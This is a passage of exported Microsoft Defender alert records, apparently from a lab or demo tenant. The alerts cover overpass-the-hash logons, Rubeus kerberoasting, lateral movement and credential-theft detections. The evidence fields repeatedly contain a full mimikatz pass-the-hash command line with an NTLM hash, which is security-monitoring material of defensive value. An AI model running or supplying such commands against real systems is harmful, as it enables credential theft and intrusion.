2022-11-21T02:17:48.4727484Z
2022-11-21T03:29:50.9633333Z
null
2022-11-21T02:05:26.3100593Z
2022-11-21T02:33:42.4354734Z
Successful logon using overpass-the-hash with potentially stolen credentials
An attacker accessed a resource with credentials that might have been obtained using an overpass-the-hash attack. An overpass-the-hash attack typically involves obtaining a password hash from memory and then using the hash to obtain a Kerberos ticket. The ticket is then used to authenticate to network resources.
LateralMovement
New
Medium
null
UnsupportedAlertType
null
null
MTP
9bd9c53d-2d3a-4af1-8c6d-a1d33ec33ede
null
null
null
[ "T1550.002", "T1550.003" ]
[ { "aadDeviceId": "14b11ffe-5128-4842-bbdf-31f0fbfcb600", "defenderAvStatus": "Updated", "deviceDnsName": "msdxv2-win10b.msdxv2.m365dpoc.com", "firstSeen": "2022-08-08T08:29:47.252Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "steve", "domainName": "MSDXV2" } ], "mdatpDeviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "onboardingStatus": "Onboarded", "osBuild": 19043, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Semi Auto Client", "riskScore": "High", "tags": [ "semi auto" ], "version": "21H1", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10B", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "2f7d6bc4-df6d-4836-becd-aff9cb361b66" } } ]
[ { "aadUserId": "89b6fc86-af84-47b2-a72d-325362598b2c", "accountName": "ronhd", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-11-21T02:17:48.5166667Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "ronhd@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1111", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": null, "deviceId": null, "domainName": null, "entityType": "Ip", "evidenceCreationTime": "2022-11-21T02:17:48.5166667Z", "fileName": null, "filePath": null, "ipAddress": "10.0.0.9", "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
da638043451229455168_134866268
ae3bb072-e90e-42fc-adf9-345144720e65
741
MicrosoftDefenderForEndpoint
2022-11-18T05:12:02.9455314Z
2022-11-19T01:35:46.6533333Z
2022-11-19T01:35:46.5533333Z
2022-11-18T05:10:15.2094768Z
2022-11-18T05:14:15.9918082Z
Possible use of the Rubeus kerberoasting tool
Activity indicating the use of the Rubeus tool was observed on this endpoint. This tool can perform kerberoasting, pass-the-ticket, and other attack techniques that take advantage of Kerberos authentication. During these attacks, attackers often request Kerberos tickets for an account's service principal name (SPN). They then decrypt the tickets to get plaintext credentials associated with the account. Alternatively, they can perform the pass-the-ticket technique to authenticate directly without having to decrypt the obtained tickets.
SuspiciousActivity
Resolved
Medium
null
UnsupportedAlertType
TruePositive
SecurityTesting
WindowsDefenderAtp
6606ef29-d293-4f24-a7c5-334dcb40b412
takeshi@msdxv2.m365dpoc.com
null
null
[ "T1558.003" ]
[ { "aadDeviceId": "14b11ffe-5128-4842-bbdf-31f0fbfcb600", "defenderAvStatus": "Updated", "deviceDnsName": "msdxv2-win10b.msdxv2.m365dpoc.com", "firstSeen": "2022-08-08T08:29:47.252Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "steve", "domainName": "MSDXV2" } ], "mdatpDeviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "onboardingStatus": "Onboarded", "osBuild": 19043, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Semi Auto Client", "riskScore": "Critical", "tags": [ "semi auto" ], "version": "21H1", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10B", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "2f7d6bc4-df6d-4836-becd-aff9cb361b66" } } ]
[ { "aadUserId": "89b6fc86-af84-47b2-a72d-325362598b2c", "accountName": "ronhd", "detectionStatus": null, "deviceId": null, "domainName": "MSDXV2", "entityType": "User", "evidenceCreationTime": "2022-11-18T05:12:02.97Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "ronhd@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1111", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
da638072968583158181_286494073
da638072968583158181_286494073
975
MicrosoftDefenderForEndpoint
2022-12-22T09:07:38.3159548Z
2022-12-22T09:09:50.03Z
null
2022-12-22T08:38:05.6474582Z
2022-12-22T08:38:18.0452419Z
Possible lateral movement
Lateral movement on another device was observed in close time proximity to a suspicious network event on this device. This could mean that an attacker is attempting to move laterally across devices to gather data or elevate privileges. This alert was triggered based on a Microsoft Defender for Endpoint alert.
LateralMovement
New
Medium
null
UnsupportedAlertType
null
null
MTP
ab3e5834-3d38-42c5-aaa6-c1cfc6c02882
null
null
null
[ "T1570", "T1021", "T1021.002", "T1021.003", "T1021.004", "T1021.006" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "msdxv8-win10b.msdxv8.m365dpoc.com", "firstSeen": "2022-12-08T01:04:21.9057174Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "steve", "domainName": "MSDXV8" } ], "mdatpDeviceId": "4f111b3b2366eacdcc66d7ad73548fff9b039c15", "onboardingStatus": "Onboarded", "osBuild": 19043, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "UnassignedGroup", "riskScore": "Critical", "tags": [], "version": "21H1", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV8/providers/Microsoft.Compute/virtualMachines/MSDXV8-Win10B", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "97e5e58b-3d5e-4bfe-8e40-a88b49deff08" } } ]
[]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-11-21T02:03:44.9Z
Suspicious
None
jeff
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
4f4970c3545972fea2bc1984d597fc810e6321e0
25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369
net.exe
C:\Windows\System32
10,556
type secret.txt
2022-11-21T02:01:37.8071047Z
11,068
2022-11-21T02:01:28.4753286Z
powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0
Detected
c7e147cb0eb3534a4dcea5acb8e61c933713b145
da638045930199825735_1916178811
65a2531d-394f-42c9-999c-1435a314339e
765
MicrosoftDefenderForEndpoint
2022-11-21T02:03:39.9825986Z
2022-11-21T02:34:51.19Z
null
2022-11-21T02:01:44.3120047Z
2022-11-21T02:32:59.4225944Z
Malicious credential theft tool execution detected
A known credential theft tool execution command line was detected. Either the process itself or its command line indicated an intent to dump users' credentials, keys, plain-text passwords and more.
CredentialAccess
New
High
null
UnsupportedAlertType
null
null
WindowsDefenderAtp
f5d3c5d8-ec3a-4412-ab45-934d8faff42c
null
null
null
[ "T1003" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "lab.net", "firstSeen": "2022-08-08T08:51:02.455Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "jeff", "domainName": "MSDXV2" } ], "mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Full Auto Clients", "riskScore": "High", "tags": [ "Full auto" ], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0" } } ]
[ { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-11-21T02:03:40.3033333Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-11-21T02:03:40.3033333Z", "fileName": "Get-KRBTicket.ps1", "filePath": "C:\\M365DAttack", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "8cd78c31fcbe15d0c3ae78c06e5136983b438586", "sha256": "5dbd299b13a978274d1a2bf59b58abc66277896c3ab867783f226750d620e4e1", "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:03:40.3033333Z", "fileName": "mimikatz.exe", "filePath": "C:\\M365DAttack\\Mimikatz\\x64", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 11068, "processCommandLine": "\"mimikatz.exe\" privilege::debug \"sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv2.m365dpoc.com /run:\\\"powershell.exe C:\\M365DAttack\\Get-KRBTicket.ps1\\\"\" exit -Wait", "processCreationTime": "2022-11-21T02:01:44.2419747Z", "processId": 7452, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "70df765f554ed7392200422c18776b8992c09231", "sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:03:40.3033333Z", "fileName": "powershell.exe", "filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "ipAddress": null, "parentProcessCreationTime": "2022-11-10T07:07:26.0872385Z", "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": 4680, "processCommandLine": "\"powershell.exe\" -noexit -command Set-Location -literalPath 'C:\\Users\\jeff\\Downloads'", "processCreationTime": "2022-11-21T02:01:28.4753286Z", "processId": 11068, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c", "sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:07:44.1133333Z", "fileName": "mimikatz.exe", "filePath": "C:\\M365DAttack\\Mimikatz\\x64", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 11068, "processCommandLine": "\"mimikatz.exe\" privilege::debug \"sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv2.m365dpoc.com /run:\\\"powershell.exe C:\\M365DAttack\\Get-KRBTicket.ps1\\\"\" exit -Wait", "processCreationTime": "2022-11-21T02:05:30.8777946Z", "processId": 5572, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "70df765f554ed7392200422c18776b8992c09231", "sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:13:44.1633333Z", "fileName": "mimikatz.exe", "filePath": "C:\\M365DAttack\\Mimikatz\\x64", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 11068, "processCommandLine": "\"mimikatz.exe\" privilege::debug \"sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv2.m365dpoc.com /run:\\\"powershell.exe C:\\M365DAttack\\Get-KRBTicket.ps1\\\"\" exit -Wait", "processCreationTime": "2022-11-21T02:11:27.7053403Z", "processId": 6376, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "70df765f554ed7392200422c18776b8992c09231", "sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:15:28.2966667Z", "fileName": "mimikatz.exe", "filePath": "C:\\M365DAttack\\Mimikatz\\x64", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 11068, "processCommandLine": "\"mimikatz.exe\" privilege::debug \"sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv2.m365dpoc.com /run:\\\"powershell.exe C:\\M365DAttack\\Get-KRBTicket.ps1\\\"\" exit -Wait", "processCreationTime": "2022-11-21T02:13:46.7172682Z", "processId": 10944, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "70df765f554ed7392200422c18776b8992c09231", "sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:17:46.8666667Z", "fileName": "mimikatz.exe", "filePath": "C:\\M365DAttack\\Mimikatz\\x64", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 11068, "processCommandLine": "\"mimikatz.exe\" privilege::debug \"sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv2.m365dpoc.com /run:\\\"powershell.exe C:\\M365DAttack\\Get-KRBTicket.ps1\\\"\" exit -Wait", "processCreationTime": "2022-11-21T02:15:44.11798Z", "processId": 7388, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "70df765f554ed7392200422c18776b8992c09231", "sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-11-21T02:23:43.0433333Z", "fileName": "Get-KRBTicket.ps1", "filePath": "C:\\M365DAttack", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "9f01ec196f6e324de6587a716fce47a75fc73bae", "sha256": "e12d110a9b4837e7495dee781e0ea9b3b753dd2ded7ff0576f7479234d4322da", "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:23:43.0433333Z", "fileName": "mimikatz.exe", "filePath": "C:\\M365DAttack\\Mimikatz\\x64", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 11068, "processCommandLine": "\"mimikatz.exe\" privilege::debug \"sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv2.m365dpoc.com /run:\\\"powershell.exe C:\\M365DAttack\\Get-KRBTicket.ps1\\\"\" exit -Wait", "processCreationTime": "2022-11-21T02:22:00.8662295Z", "processId": 8868, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "70df765f554ed7392200422c18776b8992c09231", "sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:25:43.57Z", "fileName": "mimikatz.exe", "filePath": "C:\\M365DAttack\\Mimikatz\\x64", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 11068, "processCommandLine": "\"mimikatz.exe\" privilege::debug \"sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv2.m365dpoc.com /run:\\\"powershell.exe C:\\M365DAttack\\Get-KRBTicket.ps1\\\"\" exit -Wait", "processCreationTime": "2022-11-21T02:24:23.5089774Z", "processId": 7660, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "70df765f554ed7392200422c18776b8992c09231", "sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:25:44.0366667Z", "fileName": "mimikatz.exe", "filePath": "C:\\M365DAttack\\Mimikatz\\x64", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 11068, "processCommandLine": "\"mimikatz.exe\" privilege::debug \"sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv2.m365dpoc.com /run:\\\"powershell.exe C:\\M365DAttack\\Get-KRBTicket.ps1\\\"\" exit -Wait", "processCreationTime": "2022-11-21T02:23:51.0663034Z", "processId": 9244, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "70df765f554ed7392200422c18776b8992c09231", "sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:32:39.8633333Z", "fileName": "mimikatz.exe", "filePath": "C:\\M365DAttack\\Mimikatz\\x64", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 11068, "processCommandLine": "\"mimikatz.exe\" privilege::debug \"sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv2.m365dpoc.com /run:\\\"powershell.exe C:\\M365DAttack\\Get-KRBTicket.ps1\\\"\" exit -Wait", "processCreationTime": "2022-11-21T02:30:58.325205Z", "processId": 1884, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "70df765f554ed7392200422c18776b8992c09231", "sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:34:51.16Z", "fileName": "mimikatz.exe", "filePath": "C:\\M365DAttack\\Mimikatz\\x64", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 11068, "processCommandLine": "\"mimikatz.exe\" privilege::debug \"sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv2.m365dpoc.com /run:\\\"powershell.exe C:\\M365DAttack\\Get-KRBTicket.ps1\\\"\" exit -Wait", "processCreationTime": "2022-11-21T02:32:59.2288177Z", "processId": 7708, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "70df765f554ed7392200422c18776b8992c09231", "sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
da638045930747995801_1774314318
51dd330f-40c1-4ba4-bd2d-52e332a80a92
765
MicrosoftDefenderForEndpoint
2022-11-21T02:04:34.7995952Z
2022-11-21T02:36:19.8166667Z
null
2022-11-21T02:01:45.0435409Z
2022-11-21T02:33:42.858223Z
File dropped and launched from remote location
A remote session dropped a file and executed it. An attacker or a malware might be an attempting move laterally or propagate.
LateralMovement
New
Medium
49
PendingApproval
null
null
WindowsDefenderAtp
17d50613-c135-4981-858e-86cdecb4e46e
null
null
null
[ "T1021.002", "T1105", "T1570" ]
[ { "aadDeviceId": "14b11ffe-5128-4842-bbdf-31f0fbfcb600", "defenderAvStatus": "Updated", "deviceDnsName": "msdxv2-win10b.msdxv2.m365dpoc.com", "firstSeen": "2022-08-08T08:29:47.252Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "steve", "domainName": "MSDXV2" } ], "mdatpDeviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "onboardingStatus": "Onboarded", "osBuild": 19043, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Semi Auto Client", "riskScore": "None", "tags": [ "semi auto" ], "version": "21H1", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10B", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "2f7d6bc4-df6d-4836-becd-aff9cb361b66" } } ]
[ { "aadUserId": "89b6fc86-af84-47b2-a72d-325362598b2c", "accountName": "ronhd", "detectionStatus": null, "deviceId": null, "domainName": "MSDXV2", "entityType": "User", "evidenceCreationTime": "2022-11-21T02:04:34.8433333Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "ronhd@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1111", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": null, "deviceId": null, "domainName": null, "entityType": "User", "evidenceCreationTime": "2022-11-21T02:04:34.8433333Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": null, "userSid": "S-1-0-0", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": "Detected", "deviceId": 